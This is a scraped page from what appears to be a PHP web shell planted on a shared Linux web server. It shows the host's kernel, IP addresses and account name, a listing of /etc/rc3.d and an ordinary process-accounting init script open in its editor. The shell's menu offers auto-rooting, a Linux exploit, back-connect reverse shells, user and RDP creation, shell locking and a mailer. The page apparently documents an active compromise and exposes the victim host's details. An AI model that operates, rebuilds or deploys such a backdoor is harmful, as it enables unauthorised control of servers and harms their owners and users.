Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
rc3.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01apache2
7.99
KB
-rwxr-xr-x
K01ipmievd
3.09
KB
-rwxr-xr-x
K01stunnel4
5.6
KB
-rwxr-xr-x
K01sysstat
1.54
KB
-rwxr-xr-x
S01acct
2.06
KB
-rwxr-xr-x
S01apport
2.85
KB
-rwxr-xr-x
S01atd
1.05
KB
-rwxr-xr-x
S01cachefilesd
7.08
KB
-rwxr-xr-x
S01console-setup.sh
1.2
KB
-rwxr-xr-x
S01cron
2.99
KB
-rwxr-xr-x
S01dbus
3.08
KB
-rwxr-xr-x
S01fail2ban
6.85
KB
-rwxr-xr-x
S01grub-common
985
B
-rwxr-xr-x
S01irqbalance
2.58
KB
-rwxr-xr-x
S01lvm2-lvmpolld
586
B
-rwxr-xr-x
S01mpt-statusd
5.95
KB
-rwxr-xr-x
S01nginx
4.47
KB
-rwxr-xr-x
S01ntp
1.46
KB
-rwxr-xr-x
S01open-vm-tools
1.8
KB
-rwxr-xr-x
S01openipmi
13.46
KB
-rwxr-xr-x
S01plymouth
1.35
KB
-rwxr-xr-x
S01postfix
3.02
KB
-rwxr-xr-x
S01proftpd
5.2
KB
-rwxr-xr-x
S01rsync
4.31
KB
-rwxr-xr-x
S01smartmontools
3.02
KB
-rwxr-xr-x
S01ssh
3.96
KB
-rwxr-xr-x
S01unattended-upgrades
1.36
KB
-rwxr-xr-x
S01uuidd
1.28
KB
-rwxr-xr-x
S01zabbix-agent
1.54
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S01acct
#!/bin/sh ### BEGIN INIT INFO # Provides: acct # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: process and login accounting # Description: GNU Accounting Utilities is a set of utilities which # reports and summarizes data about user connect times and # process execution statistics. ### END INIT INFO PATH=/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/sbin/accton NAME=acct DESC="process accounting" LOCKFILE=/var/lock/subsys/acct test -x $DAEMON || exit 0 . /lib/lsb/init-functions # Include acct defaults if available if [ -f /etc/default/acct ] then . /etc/default/acct else ACCT_ENABLE="1" ACCT_LOGGING="30" fi set -e case "$1" in start) if [ "${ACCT_ENABLE}" = "1" ] then # Have to turn this on to be able to test the return code set +e /usr/sbin/accton /var/log/account/pacct 2>/dev/null rv=$? if [ $rv -eq 0 ] then touch $LOCKFILE log_success_msg "Done." elif [ $rv -eq 38 ] then log_failure_msg "Failed." log_warning_msg "Process accounting not available on this system." elif [ $rv -eq 16 ] then log_failure_msg "Failed." log_warning_msg "Process accounting already running on this system." else logger -p daemon.err "Unexpected error code $rv received in /etc/init.d/acct" fi fi set -e ;; stop) # Have to turn this on to be able to test the return code set +e /usr/sbin/accton off 2>/dev/null if [ $? -eq 0 ] then log_success_msg "Done." rm -f $LOCKFILE else log_failure_msg "Failed." log_warning_msg "Process accounting not available on this system." fi set -e ;; restart|force-reload) $0 stop sleep 1 $0 start ;; status) if [ -f $LOCKFILE ] then echo "Accounting is enabled." else echo "Accounting is not enabled." fi ;; *) N=/etc/init.d/$NAME echo "Usage: $N {start|stop|status|restart|force-reload}" >&2 exit 1 ;; esac exit 0
Close